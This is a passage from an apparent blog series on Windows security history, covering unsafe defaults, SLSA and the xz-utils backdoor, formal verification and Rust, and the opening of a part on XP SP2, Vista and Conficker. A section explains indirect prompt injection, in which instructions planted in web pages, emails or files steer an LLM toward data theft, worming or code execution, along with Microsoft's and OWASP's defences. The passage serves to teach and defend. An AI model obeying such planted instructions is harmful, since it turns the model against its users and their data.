The aggregate catalog of unsafe defaults the era's lessons forced into the playbook, each at its own stage in 2026:

NetBIOS over TCP exposed by default (deprecated; off by default).
NTLM as a first-class protocol (Microsoft announced default-off deprecation in October 2023, with a rolling transition through Windows Server 2025 and later releases [@techcommunity-ntlm-evolution-2023]).
ActiveX by default in the IE Internet zone (removed with IE retirement in 2022).
Autorun on removable media (default-off after Windows 7 patch in February 2011 [@kb971029-autorun-wayback]).
Office macros enabled by default (default-block for internet-marked files since 2022 [@ms-learn-internet-macros-blocked]).
PowerShell v2 (deprecated 2017, removed by default in Windows 11 23H2 [@devblogs-powershell-v2-deprecation]).
Office Equation Editor (deprecated 2017, removed 2018 after CVE-2017-11882 [@nvd-cve-2017-11882]).

The 2002 template won. The modern industry runs on its descendants. But "won" does not mean "solved" -- the same eight-engineer SWI of 2000 has descendants in 2026 that still ship the same memory-safety bugs Cutler's NT kernel shipped in 1993. What changed? What did not?

10. State of the Art (and the Wars Ahead)

Open with the humility. Microsoft's own 2019 MSRC retrospective is the figure CISA preserves verbatim: "approximately 70% of the vulnerabilities Microsoft assigns a CVE each year continue to be memory safety issues" [@cisa-urgent-need-memory-safety] [@cisa-memory-safe-roadmaps].

Twenty-five years after the SDL's birth, the dominant CVE class is the same one the NT 3.1 -> NT 4.0 -> IIS 5.0 series shipped throughout the 1990s and Code Red weaponized in 2001.An earlier draft credited Cutler's NT-kernel team with shipping idq.dll in 1993. That attribution is wrong on both counts. idq.dll first shipped with Microsoft Index Server 1.0 for Windows NT 4.0 in 1996, and it was authored by the Index Server / IIS-ISAPI team, not the Cutler-led NT-kernel team. The load-bearing claim -- that the dominant CVE class today is the same memory-safety class the NT-line products shipped throughout the 1990s and Code Red weaponized in 2001 -- is preserved without the inaccurate attribution. The discipline the era forced was necessary; it was not sufficient.

Three frontiers carry that residual problem forward into the next decade.

Frontier 1: supply-chain integrity (SLSA v1.0 Build track levels)

SLSA -- Supply-chain Levels for Software Artifacts -- is the post-SolarWinds extension of the SDL pattern to the build pipeline itself. The v1.0 specification defines four Build track levels, with verbatim per-level guarantees [@slsa-v1-levels]:

Build L0. No SLSA. No claims about provenance.
Build L1. "Provenance showing how the package was built." Crucially, the spec is explicit that at L1 "provenance may be incomplete and/or unsigned" -- L1 defends against mistakes and gives consumers something to inspect, not against tampering [@slsa-v1-levels].
Build L2. Signed provenance, "generated by a hosted build platform." The signature belongs to the build platform, not the producer -- specifically, "by a key that is only accessible to the build platform" -- so post-build tampering by the producer is detectable [@slsa-v1-levels].
Build L3. Hardened build platform: builds run in isolation so one build cannot influence another, and the signing key is "not accessible to user-defined build steps" so an insider with a malicious build script cannot forge signed provenance [@slsa-v1-levels].

A Source track existed in SLSA's v0.1 draft and was explicitly deferred from v1.0. The future-directions page is direct about why: "A Source track could provide protection against tampering of the source code prior to the build" [@slsa-future-directions]. The reason it is not in v1.0: there is no automatic decision procedure that distinguishes a malicious-but-syntactically-clean patch from a benign one.

The xz-utils CVE-2024-3094 attack is the canonical case. Andres Freund's March 29, 2024 oss-security disclosure described a multi-year campaign by an attacker using the handle "Jia Tan" who, over two and a half years (the first patch landed in October 2021), built a maintainer-grade reputation and pushed a backdoor into the xz release tarballs that diverged subtly from the git source [@freund-xz-disclosure]. Russ Cox's timeline reconstructs the social-engineering chain: the "Jigar Kumar" and "Dennis Ens" sockpuppet accounts pressuring the original maintainer to delegate authority, the gradual accretion of commit access, the backdoor delivered in the release artifacts but not the git history [@cox-xz-timeline].

Note: SLSA's Build track addresses the integrity of the path from source to artifact. It does not address the integrity of the source itself. A malicious patch that lands in the upstream repository and is built by an SLSA Build L3 platform produces a properly attested, properly signed artifact that is malicious. The xz-utils case is the existence proof. Detection here still depends on individual engineer-curiosity in the field -- Andres Freund noticed an anomalous CPU spike on his Debian sid SSH logins and chased it -- not on any mechanically verifiable property of the supply chain.

Frontier 2: AI/LLM-integrated software

The threat-modeling frameworks the SDL absorbed -- STRIDE, PASTA, LINDDUN -- were designed for systems whose components have specifications. An LLM is not such a component. Its behavior is an empirical artifact of its training data and the prompt context it receives; there is no spec a verifier can use to bound the set of outputs the model will produce for a given input.

The partial responses on the table in 2026: the NIST AI Risk Management Framework (AI RMF 1.0), released January 26, 2023 [@nist-ai-rmf]; the OWASP Top 10 for Large Language Model Applications, now part of the OWASP GenAI Security Project [@owasp-llm-top-10]; and the draft NIST SP 800-218A IPD ("Secure Software Development Practices for Generative AI and Dual-Use Foundation Models"), published April 29, 2024, by Souppaya, Vassilev, Ogata, Stanley, and Scarfone as an SSDF Community Profile mandated by Executive Order 14110 section 4.1(a)(ii) of October 30, 2023 [@nist-sp-800-218a-ipd] [@nist-sp-800-218a-ipd-pdf].

To bring this frontier to the same mechanism-grade depth as Frontier 1, the worked example below traces a single named vulnerability class -- Indirect Prompt Injection (IPI) -- from primary disclosure through vendor mitigation, productization, federal-supplier profile, and a real-world CVE.

A class of attack against LLM-integrated applications in which the attacker never interacts with the model directly. Instead, the attacker plants adversarial instructions into data the model will later retrieve -- a web page the model browses, a document the model summarizes, an email the model is asked about, a code-repository file the model is asked to refactor. When the LLM ingests that data, it treats the injected instructions as part of its prompt context and acts on them. The term was defined by Greshake, Abdelnabi, Mishra, Endres, Holz, and Fritz in their AISec 23 paper [@greshake-ipi-arxiv] [@greshake-ipi-acm].

The vulnerability class. The Greshake et al. paper (arXiv v1 February 23, 2023; AISec 23 proceedings November 30, 2023, Copenhagen) demonstrated working IPI attacks against Bing Chat (GPT-4 powered), GPT-4-integrated synthetic applications, and code-completion engines [@greshake-ipi-arxiv]. The paper's threat taxonomy enumerates four families: data theft, worming (LLM-to-LLM propagation through injected outputs that subsequent LLMs read), information-environment contamination, and arbitrary code execution at the application-functionality layer [@greshake-ipi-arxiv] [@greshake-ipi-acm].

The vendor mitigation -- Microsoft Spotlighting. Hines, Lopez, Hall, Zarfati, Zunger, and Kiciman published "Defending Against Indirect Prompt Injection Attacks With Spotlighting" (arXiv v1 March 20, 2024) [@hines-spotlighting-arxiv]. Spotlighting is a family of prompt-engineering techniques -- datamarking, encoding, per-token-marker transformations -- that, in the paper's words, provide "a reliable and continuous signal of provenance" so the model can distinguish instructions from retrieved data. The empirical claim is verbatim: "spotlighting reduces the attack success rate from greater than 50% to below 2% in our experiments with minimal impact on task efficacy" on GPT-family models [@hines-spotlighting-arxiv].

The productization -- Azure AI Content Safety Prompt Shields. Spotlighting moved from a research paper to a productized API surface: Microsoft Learn documents Prompt Shields as "a unified API in Azure AI Content Safety that detects and blocks adversarial user input attacks on large language models" [@azure-prompt-shields]. The Microsoft Docs Zero Trust SFI guidance documents the layered defense-in-depth pattern Prompt Shields and Spotlighting compose into: "Prompt shields ... Spotlighting ... Plan drift detection ... Critic agents ... Tool chain analysis ... Security guardrails" [@msdocs-defend-ipi]. MSRC's July 2025 blog "How Microsoft defends against indirect prompt injection attacks" is the canonical Microsoft narrative [@msrc-ipi-blog].

The framework mapping -- OWASP LLM01. The OWASP GenAI Security Project's LLM01 page enumerates seven prevention-and-mitigation strategies for prompt injection [@owasp-llm01-prompt-injection]. Spotlighting is the algorithmic implementation of Category 6 ("Segregate and identify external content"); system-prompt enforcement is Category 1 ("Constrain model behavior"); tool-call permission scoping is Category 4 ("Enforce privilege control and least privilege access"); human-in-the-loop checkpoints for high-risk tool calls (file write, email send, payment) are Category 5 ("Require human approval for high-risk actions") [@owasp-llm01-prompt-injection].

The federal-supplier profile -- NIST SP 800-218A IPD. The draft NIST SP 800-218A profile takes the OWASP and Microsoft Research mitigation vocabulary and translates it into SSDF practice-level language [@nist-sp-800-218a-ipd] [@nist-sp-800-218a-ipd-pdf]. The legal anchor is Executive Order 14110 section 4.1(a)(ii) of October 30, 2023; the initial public draft published April 29, 2024 with a comment deadline of June 2, 2024 [@nist-sp-800-218a-ipd].

The real-world CVE -- CVE-2024-5184 (EmailGPT). The OWASP LLM01 page Scenario #5 references CVE-2024-5184 directly. The NVD record classifies it as CWE-74 (Improper Neutralization, Injection) with CVSS Base Score 6.5 Medium; the CNA is Synopsys (Black Duck) [@nvd-cve-2024-5184]. The Black Duck CyRC advisory reconstructs the disclosure timeline: initial contact February 26, 2024; reminders April 4 and May 1; public advisory June 5, 2024 -- about ninety-nine days with no vendor response [@blackduck-cyrc-emailgpt]. Mohammed Alshehri at Black Duck CyRC discovered the vulnerability; the CyRC recommendation, verbatim, is to "remove the applications from networks immediately" [@blackduck-cyrc-emailgpt]. That recommendation is the operational evidence that the field still lacks a reliable in-band mitigation it can ship without removing the application from production.

Note: Four gaps deserve naming for readers reusing this material. First, no primary-source-grade threat-modeling method exists for the prompt-context, training-data-supply-chain, or fine-tuning-data attack surfaces in the closed-list way STRIDE exists for component-with-spec systems; OWASP LLM01's seven categories are a useful checklist but not a generative methodology. Second, Spotlighting's empirical 50%-to-2% reduction is per-model, per-task, and adversary-specific [@hines-spotlighting-arxiv] -- tested against specific GPT-family models with specific attack templates. Third, the CVE-2024-5184 disclosure timeline (Feb 26 to Jun 5, 2024, no vendor response) [@blackduck-cyrc-emailgpt] demonstrates the field still lacks the institutional analog of MSRC's 2002-era coordinated-disclosure norms for LLM-integrated applications. Fourth, the 2002-style cohort migration is not yet available: there is no equivalent of "ship telemetry, publish guidance, flip the default, deprecate, remove" for "prompt-injection-vulnerable LLM agent integrations," because the legitimate-use long tail is the entire space of LLM-integrated applications, not a single deprecated protocol like SMBv1.

Mapping the article's thesis onto this frontier: Greshake et al. named the class (February 2023) the way Saltzer and Schroeder named the principles in 1975; Microsoft published the mitigation (Spotlighting, March 2024) with a measurable effect; Microsoft productized it (Azure Prompt Shields); NIST published the federal-supplier profile (SP 800-218A IPD, April 2024); and a real-world CVE with no vendor response demonstrates the cycle has not yet completed at industry scale. The 2002 pattern -- discipline, then authority, then mitigation, then productization, then federal-supplier mandate, then coordinated-disclosure norm -- is in progress for the AI/LLM frontier, and the reader can see exactly which steps remain.

Frontier 3: the formal-verification gap

The proof-of-correctness path has narrowed the gap between SOTA shipped code and the theoretical upper bound, but not closed it.

The canonical worked example is seL4: a formally verified microkernel, Klein et al., SOSP 2009 [@klein-sel4-sosp-2009]. The seL4 FAQ lists per-architecture kernel sizes for the verified configurations: roughly 10,000 source-lines-of-code on RISC-V 64, 12,100 on AArch32, 12,600 on AArch64 with hypervisor extensions, and 16,000 on x64 [@sel4-faq]. The proof-to-code ratio is approximately 20 to 1 -- twenty lines of Isabelle/HOL proof for every line of kernel C -- and the proof effort was approximately twenty person-years for the original 2009 verification [@klein-sel4-sosp-2009].

Why has seL4-class verification not scaled from a microkernel to a desktop OS? The barrier is compositional: each new feature requires re-proving every relevant invariant compositionally. The cost grows non-linearly with feature surface; even with two and a half decades of tooling improvement, no verified OS at desktop-Linux or Windows scale exists in production.

Microsoft's parallel path -- the one running today, not over the next twenty years -- is the introduction of memory-safe Rust into selected Windows components. David Weston's BlueHat IL 2023 talk gave the two named exemplars: the Win32k GDI region engine (~36,000 lines of Rust) and DWriteCore (~152,000 lines of Rust) [@weston-bluehat-il-2023].

Why does Rust help when seL4-style proof does not scale? Because Rust does not try to prove "the program is correct." It enforces a weaker but mechanically checkable property at the type-system level: no aliased mutable borrows, no use-after-free. That weaker property closes most of the bug class behind the 70% memory-safety figure, by construction, at compile time -- without any per-program proof effort.

That trade-off is the load-bearing engineering pattern of every secure-development framework since 2002. There is a name for it in the formal-methods literature, and a 1953 theorem behind it.

A mechanically checkable proxy property that closes the most common subset of an undecidable semantic property's bug class. Rice's theorem (Henry Rice, *Transactions of the AMS* 74, 1953) says any non-trivial semantic property of a Turing-recognizable program is undecidable -- you cannot, in general, write a checker that decides whether an arbitrary program has the property. The SDL's engineering workaround has always been to substitute a *decidable* property that catches the most common cases. `banned.h` substitutes "is this textual symbol present?" (trivially decidable, mechanically enforceable) for "is this string copy memory-safe?" (undecidable). C28719 is the descendant of that substitution that still release-gates Windows drivers in 2026 [@msft-c28719]. Rust's borrow-checker is the same trick at the language layer: it substitutes "is every borrow either exclusive or shared?" for "is the program memory-safe?", closing a much larger class of bugs by construction.

The unifying pattern across sections 7, 9, and 10:

Key idea: Rice's theorem says the question we want to answer is undecidable. The discipline that emerged from the 2002 Push said: substitute a question we can answer, make the substitution good enough, and gate releases on the substituted question. Every generation since -- banned.h, strsafe.h, C28719, the Rust borrow-checker, SLSA Build attestations -- has substituted a better question.

The series this article opens has five more parts -- beginning with Part 2 (2002-2008) -- each working a generation forward:

flowchart LR P1[Part 1: Wild West and TwC memo 1995-2002] --> P2[Part 2: XP SP2 DEP NX Windows Firewall WRP early ASLR Aug 2004] P2 --> P3[Part 3: Vista UAC MIC BitLocker PatchGuard driver signing Nov 2006] P3 --> P4[Part 4: Windows 7 to 10 AppContainer Credential Guard Device Guard 2009-2015] P4 --> P5[Part 5: Cloud era Azure AD Conditional Access Entra ID 2015-present] P5 --> P6[Part 6: Endpoint defenses HVCI VBS Pluton Rust in Windows 2018-2026]

Mandatory Integrity Control (MIC) is a Windows Vista (2006) feature, not an NT-era latent design. Vista introduced integrity levels (Low, Medium, High, System) and the integrity-level-tagged DACLs that make MIC work; UAC builds on top. Part 3 of this series will work the mechanism in detail.

For readers who want the mechanics rather than the history: this article is the institutional birth; the companion in-depth posts cover the primitives. The Windows access-control model post walks the SRM, DACLs, SACLs, and SIDs in operational detail; the DPAPI post covers the user-key derivation pipeline; the NT Kerberos post covers the LSA, the KDC, the TGT, and the ticket-granting flow; the smart cards post covers the certificate-bound credential path.

The story ends, but the wars do not. The institutional pattern the era forced is now twenty-five years old; the bug class that forced it is still ~70% of shipped CVEs. The next twenty-five years will repeat the operationalization pattern at progressively more abstract layers -- supply chain, machine-learning model, the developer's autonomous agent. The hard part has never been the technical question. The hard part is always the executive willingness to halt feature work to answer it.

11. Frequently Asked Questions

Every retelling of this era invites a predictable set of pushbacks. Address them head-on, so the article can end on wonder, not on quibble.

No, and the cost-and-mechanism evidence is the rebuttal. The Push was approximately ten weeks of paused feature work across ~8,500 Windows engineers at a total cost of ~$100 million in foregone feature work, and the methodology survived twenty-plus years as the published Microsoft SDL, ISO/IEC 27034, OWASP SAMM, BSIMM, NIST SSDF, SLSA, and CISA Secure by Design [@howard-lipner-push-2003] [@washtech-microsoft-100m] [@msft-sdl-practices] [@iso-27034-1] [@owasp-samm-model] [@bsimm-home] [@nist-ssdf-218] [@slsa-home] [@cisa-secure-by-design]. A PR move does not survive a fiscal-quarter reporting cycle, let alone two decades and a peer-reviewed primary-source accounting in IEEE *Security and Privacy* [@howard-lipner-push-2003]. Partly. OpenBSD's audit-driven engineering culture started in the summer of 1996, six years before the Windows Security Push; its "six to twelve" auditor team has been continuously active since [@openbsd-security]. The OpenBSD slogan -- "only two remote holes in the default install, in a heck of a long time" -- is real and earned [@openbsd-security]. The distinction is scale and incentive: OpenBSD's model worked for a small homogeneous codebase with self-selected auditors and a permissive-license, no-revenue context; the SDL's model was built for a fifty-thousand-person, hundred-million-line, quarterly-revenue context. Parallel paths, not competitors. No -- the eEye back-reference in their own August 4, 2001 Code Red II advisory points at advisory `AL20010717.html`, that is, **July 17, 2001**, for the original Code Red I discovery [@eeye-codered-ii]. CAIDA's measurement of the saturating Code Red v2 outbreak covers the **July 19, 2001** event with ~359,000 unique IPs in under fourteen hours [@caida-codered]. The defensible phrasings are "mid-July 2001" or "July 17, 2001" for Code Red I, and "July 19, 2001" for Code Red v2. No. ILOVEYOU was a **VBScript / Windows Script Host email worm**, executed by `wscript.exe` when the user double-clicked the `LOVE-LETTER-FOR-YOU.TXT.vbs` attachment in Outlook [@cert-ca-2000-04-iloveyou]. The "Concept / Melissa / ILOVEYOU" grouping in popular retellings conflates two distinct execution surfaces: Office macros (Concept, Melissa) and the Windows scripting host (ILOVEYOU). The classification matters because the fixes are different -- Office macro auto-execute is an Office configuration; WSH-by-default and the hidden double-extension display in Explorer were Windows shell decisions. No. The January 15, 2002 memo halted *Windows-division* feature work for the February-April 2002 Push, at the ~8,500-engineer scale Howard and Lipner document [@howard-lipner-push-2003]. The Office division, the .NET division, and the SQL Server division ran analogous pushes *serially* through 2002-2003, not simultaneously. The company-wide aggregate figure of "10,000 engineers" rolls those serial pushes together; the Windows-only number from the primary record is ~8,500 [@howard-lipner-push-2003] [@washtech-microsoft-100m]. Visual Studio .NET launched on schedule on February 13, 2002, after the December 2001 pre-launch security review the Gates memo names as the **template** for what the rest of the company was about to do [@gates-memo-wired]. Loren Kohnfelder and Praerit Garg, internal Microsoft memo "The Threats to Our Products," dated April 1, 1999 -- nearly three years before the Gates memo [@shostack-tm-book]. The memo is **no longer hosted on Microsoft's own web site**, but it has been publicly preserved at Adam Shostack's archive [@shostack-stride-memo-archive] (Shostack's landing page notes the document is no longer available on Microsoft's web site, "so we keep a copy here"), with an independent mirror at FIRST's CTI SIG curriculum [@first-stride-memo-mirror]. The chain-of-custody analysis is Shostack's *Threat Modeling: Designing for Security*, Wiley 2014 [@shostack-tm-book]. Microsoft's current Threat Modeling Tool is the operational descendant [@msft-threat-modeling-tool]. STRIDE's existence is the strongest single piece of evidence that the article's literal thesis ("Microsoft had no security team before January 15, 2002") needs the corrected reading in section 5 -- the methodology was *internal* by 1999; what was missing was the authority to require its use. No, and the article explicitly disclaims this reading. The underlying ideas -- Saltzer and Schroeder 1975, the Orange Book 1985, CERT/CC 1988, OpenBSD 1996, Schneier's Attack Trees December 1999, Kohnfelder and Garg's STRIDE April 1999, Howard and LeBlanc's *Writing Secure Code* November 2001 -- all predate it [@saltzer-schroeder-1975] [@tcsec-orange-book] [@openbsd-security] [@schneier-attack-trees-1999] [@shostack-tm-book] [@howard-leblanc-wsc]. What January 15, 2002 was, is the moment a fifty-thousand-person desktop-monopoly vendor first applied release-blocking executive authority to make secure development a non-negotiable engineering gate. The corrected reading -- **industrial-scale operationalization at a dominant vendor**, not the *invention* of the field -- is the only one the evidence supports. For readers who finish the article wanting to verify or extend the claims directly, the five most-useful primary sources cited throughout, by section:

Section 6 (the memo). Bill Gates, "Trustworthy computing" memo to "Microsoft and Subsidiaries: All FTE," sent Tuesday, January 15, 2002 5:22 PM Pacific. Wired's republication preserves the original mail headers verbatim [@gates-memo-wired]; the Help With Windows mirror preserves the same From: / Sent: / To: / Subject: block [@helpwithwindows-billg].
Section 7 (the Push). Michael Howard and Steve Lipner, "Inside the Windows Security Push," IEEE Security and Privacy 1(1):57-61, January-February 2003 [@howard-lipner-push-2003]. The primary-source paper for the approximately 8,500-engineer, approximately ten-week, approximately one-hundred-million-dollar, approximately 50% post-release-vulnerability-reduction numbers. DOI of record: 10.1109/MSECP.2003.1176996; IEEE Xplore is paywalled.
Section 4 (Code Red). David Moore, Colleen Shannon, Jeffery Brown, "Code-Red: a case study on the spread and victims of an Internet worm," CAIDA 2002 [@caida-codered]. The 359,000-host measurement.
Section 4 (Slammer). David Moore, Vern Paxson, Stefan Savage, Colleen Shannon, Stuart Staniford, Nicholas Weaver, "The Spread of the Sapphire/Slammer Worm," CAIDA / ICSI / Silicon Defense / UCSD / UC Berkeley 2003 [@caida-slammer]. The 8.5-second-doubling, ten-minute-saturation, approximately 75,000-host primary.
Section 10 (formal verification). Gerwin Klein, Kevin Elphinstone, Gernot Heiser, et al., "seL4: Formal Verification of an OS Kernel," SOSP 2009 [@klein-sel4-sosp-2009]. The formal-verification anchor; project FAQ at [@sel4-faq].

One sentence to carry forward, restating the article's load-bearing observation in plain English: the breakthrough was organizational, not technical. Same checklists, different signoff power. That pattern -- "make existing methods mandatory, and gate releases on them" -- is what every secure-development framework on the industry shelf in 2026 has, in its own vocabulary, copied. The next twenty-five years will copy it at the supply-chain layer, the machine-learning-model layer, and the autonomous-agent layer; the pattern is what travels.

Eight Primitives, One Worm: The Windows Security Wars Part 2 (2002-2008)

noreply@paragmali.com (Parag Mali) — Fri, 29 May 2026 00:00:00 GMT

Between Bill Gates's January 15, 2002 Trustworthy Computing memo and Windows 7's October 22, 2009 general availability, Microsoft executed the largest single security re-architecture in Windows's history -- and shipped most of it inside Windows Vista, one of the most poorly received consumer Windows releases ever made.

This is the story of what that re-architecture built (UAC, Mandatory Integrity Control, UIPI, ASLR, mandatory x64 driver signing, Service Hardening, BitLocker, the Windows Filtering Platform, Windows Resource Protection, and -- inherited from an April 2005 x64-only release that Vista did not introduce -- Kernel Patch Protection), and what Vista broke for compatibility and goodwill along the way.

Then Conficker (late November 2008, twenty-nine days after the MS08-067 patch) proved that deployment velocity, not discovery latency, is the binding constraint on Internet security. Windows 7's polished re-release of substantially the same security architecture is the article's evidence that the user-hostility tax is payable -- if the work is done.

1. The Patch Was Already a Month Old

On Thursday, October 23, 2008, the Microsoft Security Response Center shipped MS08-067 out of band -- not on the next Patch Tuesday, because the analysts who triaged the bug believed a wormable exploit was weeks away, not months [@s-ms08-067]. They were right about the direction and wrong about the calendar. Roughly twenty-nine days later, anchored to November 20, 2008 in SRI International's technical analysis, Conficker.A began walking the IPv4 address space on TCP/445 [@s-sri-conficker-c-addendum]. Within four months the worm had infected somewhere between nine and fifteen million machines on a vulnerability whose patch had existed the entire time [@s-cwg-lessons-learned-2019].

The October 23, 2008 Microsoft Security Bulletin patching CVE-2008-4250, a stack buffer overflow in the path-handling code reachable through the Server service's `srvsvc` RPC interface on TCP/445 (and TCP/139 in NetBT environments). The bulletin text warns the vulnerability "could be used in the crafting of a wormable exploit" -- a prediction that Conficker.A confirmed twenty-nine days later [@s-ms08-067]. A Microsoft security update released outside the regular monthly Patch Tuesday cadence (the second Tuesday of the month). Microsoft reserves out-of-band releases for vulnerabilities whose risk profile -- active exploitation, imminent worm potential, or critical pre-authentication remote code execution -- does not survive the wait until the next monthly bulletin window [@s-msft-secupdates-index].

This article is the story of what Microsoft built between January 15, 2002 (the Trustworthy Computing memo) and October 22, 2009 (Windows 7 general availability), the architectural and cultural costs of that build, and the operational lesson Conficker forced everyone to acknowledge.

The architectural defenses that Trustworthy Computing produced -- Data Execution Prevention, Address Space Layout Randomization, the Windows Firewall on by default, Service Hardening, the integrity-level stack -- could only protect machines that ran the new code. The installed base did not run the new code. Server 2003 and Windows XP were still the working majority on TCP/445-reachable subnets in late 2008, and Vista's DEP and ASLR materially raised exploitation cost on Vista without raising it on the systems the worm actually walked.

Confusing the October-2008 in-the-wild MS08-067 exploitation with Conficker is the most common single error in retellings of this period. The NVD entry for CVE-2008-4250 is explicit: the October-2008 in-the-wild exploitation was Gimmiv.A, a narrower non-self-propagating Trojan, not Conficker [@s-nvd-cve-2008-4250]. Conficker.A first appeared on the Internet on November 20, 2008 per SRI International [@s-sri-conficker-c-addendum].

sequenceDiagram autonumber participant MSRC as Microsoft Security Response Center participant SRV as Server service over TCP/445 participant VISTA as Vista with DEP and ASLR participant XP as XP and Server 2003 installed base participant CONF as Conficker.A MSRC->>SRV: Oct 23, 2008 out-of-band MS08-067 patch Note over MSRC,SRV: Bulletin warns "wormable exploit" possible SRV-->>XP: Patch must propagate via Automatic Updates or WSUS SRV-->>VISTA: Patch applied, DEP and ASLR raise exploit cost Note over XP,VISTA: Late October, in-the-wild Gimmiv.A Trojan uses CVE-2008-4250 narrowly CONF->>XP: Nov 20, 2008 Conficker.A scans TCP/445 across IPv4 Note over CONF,XP: Unpatched XP and Server 2003 are the dominant targets XP-->>CONF: Successful exploitation, lateral spread, DGA callback Note over CONF,XP: Jan to Apr 2009, 9 to 15 million infections worldwide

By the end of the article you will be able to name every XP SP2 and Vista mitigation, the attack class it broke, the compatibility cost it imposed, and which Windows release inherited or smoothed it. You will know why the most important Trustworthy Computing lesson was not architectural at all -- it was operational.

Key idea: The patch existed the entire time. Deployment did not. Every Trustworthy Computing mitigation in this article is a partial answer to the question "what reaches the installed base on time?" Conficker is the era's answer to the question "what does not?"

How did we get from the Code Red era to a Trustworthy-Computing world where a wormable RCE could still infect millions? Start with one memo and a stand-down.

2. Where Part 1 Left Off

On the morning of January 16, 2002, the engineers who worked on Windows came back to work and could not check in code. Bill Gates's memo had gone out the previous afternoon and reading it took about eleven minutes. The order in the building was the simple part: stop everything, sit through retraining, do not commit until you can argue your changes against a threat model.

The slower part was naming what had just happened. It was not a campaign. It was a directive that quietly changed the unit of work at Microsoft from "ship the feature" to "ship the feature you can prove will not get someone exploited."

The memo itself was the institutional charter for everything in this article. It opened in plain prose -- "Every few years I have sent out a memo talking about the highest priority for the company" -- and arrived at its load-bearing sentence in the fifth sentence of the first paragraph: "Trustworthy Computing is the highest priority for all the work we are doing" [@s-gates-twc-wired]. The line read in 2002 as a corporate goal-setting exercise. In retrospect it read as a contract.

The Wired and CNET reproductions of the memo carry the same body but differ on the timestamp in the "Sent:" header. Wired records "Sent: Tuesday, January 15, 2002 5:22 PM" [@s-gates-twc-wired]; CNET's parallel reproduction shows "Sent: Tuesday, January 15, 2002 2:22 PM" [@s-gates-twc-cnet]. The three-hour delta is the Eastern-vs-Pacific wall-clock difference, consistent with Wired having an Eastern copy and CNET reproducing a Pacific one. The article renders the send time as "2:22 PM Pacific / 5:22 PM Eastern."

Trustworthy Computing is the highest priority for all the work we are doing. -- Bill Gates, internal Microsoft memo, January 15, 2002 [@s-gates-twc-wired]

The next two months turned the memo into engineering. From roughly February through March 2002, Microsoft ran the Windows security stand-down: approximately 8,500 Windows engineers were pulled off feature work to read Howard and LeBlanc's Writing Secure Code, 2nd edition (Microsoft Press, 2002) [@s-howard-leblanc-wsc2e] and to be retrained on threat modeling, input validation, integer-overflow defense, secure default selection, and the privilege-reduction patterns the book named explicitly. Three Microsoft Press security titles served as the canonical training corpus for the next several years; Writing Secure Code 2e was the one that lived on every desk.

But the stand-down was a one-time event. The thing that had to outlast it was the process. The Trustworthy Computing Security Development Lifecycle, formally adopted as a mandatory company-wide engineering process in 2004 and described at the Annual Computer Security Applications Conference that December, is the right pivot to point to.

The canonical paper, Lipner and Howard's "The Trustworthy Computing Security Development Lifecycle," ran in the ACSAC 2004 proceedings [@s-lipner-howard-acsac2004-doi]; the IEEE Xplore PDF is paywalled in 2026, so the 2006 Microsoft Press book The Security Development Lifecycle is the cite-when-possible substitute [@s-howard-lipner-sdl-book]. The SDL is what made every later Windows release feasible: each new version's threat model, security design review, fuzzing budget, and security push had a name and a sign-off list.

Microsoft's formal process specification for security engineering across the product lifecycle. The SDL mandates threat modeling, secure design review, security training, banned-API enforcement, fuzzing, attack-surface review, and a final security push before any product ships. Mandatory company-wide at Microsoft starting in 2004; the definitive ACSAC 2004 paper is the formal record [@s-lipner-howard-acsac2004-doi], and the 2006 Microsoft Press book is the publicly accessible canonical reference [@s-howard-lipner-sdl-book].

The two-and-a-half years between the memo and XP Service Pack 2 were not quiet. MS03-026 in July 2003 led to Blaster three weeks later [@s-msft-ms03-026]; MS03-039 in August 2003 led to Welchia [@s-msft-ms03-039]; MS04-011 in April 2004 led to Sasser [@s-msft-ms04-011]. Each worm was, by the standards of late 2003, a public referendum on whether the "patch fast" model could work for an installed base of hundreds of millions of machines whose users never opened Windows Update. The pattern is worth a small table.

Date	Event	Why it mattered
Jan 15, 2002	Gates Trustworthy Computing memo	Institutional charter for the next eight years of Windows security work
Feb-Mar 2002	Windows security stand-down	About 8,500 engineers retrained on secure-coding patterns
Jul 16, 2003	MS03-026 patches DCOM RPC	Patch ships about three weeks before Blaster (Aug 11)
Aug 11, 2003	Blaster worm	Patched RPC vulnerability exploited in the wild; deployment lag obvious
Aug 2003	Welchia "good worm"	Nematode-style attempt to push the patch; spreads exactly as fast as Blaster
Apr 13, 2004	MS04-011 patches LSASS	Patch ships about two weeks before Sasser
Apr 30, 2004	Sasser worm	Hits ATMs, banks, airlines; the second wormable post-patch event in a year
Dec 2004	SDL formalised at ACSAC	Process becomes a paper; mandatory across Microsoft engineering

What Microsoft was about to ship in August 2004 was not a service pack. It was a feature release with a service-pack number on it -- and it would prove that the right unit of analysis for OS-level security is not the mitigation itself but the deployment threshold the default reaches.

3. Why XP SP2 Was Treated as a Major OS Release

By the end of 2003 the SP1-era model had collapsed. The bulletin cadence was monthly; the patch was per-CVE; the deployment mechanism was opt-in; and Blaster and Sasser had both shipped while that model was running [@s-msft-secupdates-index]. None of the four design decisions individually was unreasonable. Together they had produced a Windows world in which a worm could outrun a patch by weeks, sometimes months, and the only thing standing between a Class B subnet and an exploitation rate close to 100% was whether enough users had clicked "Install."

Microsoft's response was a year-long slip. XP Service Pack 2, internally codenamed "Springboard," moved from a planned H2 2003 release to August 6, 2004, and along the way it was upgraded from "service pack" to "feature release with a service-pack number on it."

The bundle that shipped that day did five things that no prior Windows release had ever done in a single update. The Windows Firewall arrived on by default and active during the boot sequence, closing the Blaster-window race condition. Data Execution Prevention shipped with default-on policy for Windows binaries.

The Attachment Execution Service became the system-wide enforcement substrate of the Zone.Identifier NTFS Alternate Data Stream. Internet Explorer 6 SP2 got a pop-up blocker on by default plus an ActiveX opt-in framework and a Local Machine Zone lockdown. Security Center became the first centralized Control Panel surface that aggregated firewall, Automatic Updates, and antivirus state into a single place a non-technical user could understand.

James Forshaw's Project Zero retrospective on Windows network access is blunt about how thin the pre-SP2 firewall story was [@s-forshaw-projectzero-wfp]. The Internet Connection Firewall in XP RTM was technically present, but it was off by default, scoped to the Internet-facing interface, and the first thing most OEM imaging scripts disabled.

Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. -- James Forshaw, Google Project Zero [@s-forshaw-projectzero-wfp]

The conceptual move underneath SP2 is the one that matters for the rest of the article. Microsoft did not invent a single new mitigation in SP2. Software firewalls, NX-style memory protection, file-provenance tagging, pop-up blockers, and centralized policy notifications all existed somewhere already in 2003 -- in third-party products, in PaX on Linux, in OpenBSD, in academic research. What SP2 did was take those mitigations off the customer's optional configuration menu and put them in the default install.

